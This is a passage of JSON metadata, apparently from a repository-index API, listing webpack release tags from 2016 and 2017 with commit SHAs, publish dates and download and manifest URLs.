a":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1